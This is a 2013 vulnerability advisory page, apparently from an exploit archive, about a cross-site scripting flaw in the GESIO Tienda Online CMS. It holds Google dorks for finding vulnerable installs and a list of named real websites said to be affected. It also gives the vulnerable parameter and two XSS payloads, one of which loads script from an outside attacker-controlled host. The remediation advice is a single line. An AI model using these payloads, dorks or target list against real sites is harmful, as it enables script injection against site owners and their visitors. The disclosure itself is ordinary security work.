Tienda Online CMS Cross Site Scripting

Tienda Online CMS Cross Site Scripting: Posted Apr 19, 2013; Authored by Ivan Sanchez, Raul Diaz; Tienda Online CMS suffers from a cross site scripting vulnerability. The vendor has been notified of this issue. Note that this advisory has site-specific information.; tags | exploit, xss; SHA-256 | 93c112b74801b7c8122b5ecd4a34425111ec9659a7a46158160325e36fe93bcd; Download | Favorite | View

Tienda Online CMS Cross Site Scripting

+=============================================================================================+
+          Software Gestión GESIO & XSS & Allow Execute Evil Remote Code                      +
+=============================================================================================+


Author(s): Ivan Sanchez & Raul Diaz

Product: Software Gestión GESIO   
Web:http://www.gesio.com/
Versions: Modulo / Tienda Online - CM
Date: 18/04/2013

Vendor Notified: 18/04 
Vendor Notified again: 19/04

Extract:
http://www.gesio.com/tienda-online-cms-89-50-431/
"Tu tienda Online conectada a tu facturación diaria. Facturarás con el mismo sistema que vendes online.
En GESIO® pensamos que un sistema de gestión online debe tener la posibilidad de desarrollar Tienda Online" 


GOOGLE DORKS:
------------

allintext:POLÍTICA DE PROTECCIÓN DE DATOS -Software Gestión GESIO®

inurl:cms/site_0003


Sites affected  
--------------------

ALL SITES USING THIS CM

http://www.qualitycenter.es/lp/
http://www.greenhabit.es/lp/
http://www.latiendadelhormigonimpreso.com/lp/
http://www.minisub.es/lp/
http://www.vitalarchery.com/lp/
http://www.palacios-congresos-es.com/lcli/
http://www.aulasconsoftware.com/lp/
http://www.arthulencourt.eu/lp/
http://www.soltercam.com/lp/
http://www.sol-i-vent.es/lp/
http://www.ale-hop.org/lp/
http://creugal-hobby.com/lp/
http://www.xipnet.es/lp/
http://www.canterbury.es/lp/
http://ociostock.com/lp/
http://guatebloem.com/productos_listado.php

much more....

Attacks >>>>>>>>>>>>>>>>>>>


XSS & REMOTE INJECTION CODE:
---------------------------

'">><marquee><h1>EvilCode Team</h1></marquee>

Or

"><script src=http://nullcode.com.ar/code/scripts/EVIL.js></script>   EXTERNAL EVIL CODE !


Parameter Affected:
-------------------

--form 1 --

http://www.sites/comunicados_listado.php?filtro_texto= INJECT HERE

and much more...

Remediation:
------------

Could you please validate the input , sanitize each parameter.


Thanks you so much!



           NULL CODE SERVICES [ www.evilcode.com.ar ] Hunting Security Bugs!
+=============================================================================================+
+          Software Gestión GESIO & XSS & Allow Execute Evil Remote Code                      +
+=============================================================================================+

Top Authors In Last 30 Days

Red Hat 176 files
Ubuntu 96 files
indoushka 95 files
Debian 22 files
nu11secur1ty 19 files
CraCkEr 8 files
Google Security Research 7 files
Ahmet Umit Bayram 7 files
Gentoo 7 files
Apple 6 files

File Archives

Systems

AIX (428)
Apple (2,008)
BSD (373)
CentOS (57)
Cisco (1,925)
Debian (6,841)
Fedora (1,692)
FreeBSD (1,244)
Gentoo (4,329)
HPUX (879)
iOS (353)
iPhone (108)
IRIX (220)
Juniper (68)
Linux (46,793)
Mac OS X (687)
Mandriva (3,105)
NetBSD (256)
OpenBSD (485)
RedHat (13,910)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,930)
UNIX (9,309)
UnixWare (186)
Windows (6,587)
Other

Tienda Online CMS Cross Site Scripting

Tienda Online CMS Cross Site Scripting

File Archive:

September 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Tienda Online CMS Cross Site Scripting

Share This

Tienda Online CMS Cross Site Scripting

File Archive:

September 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems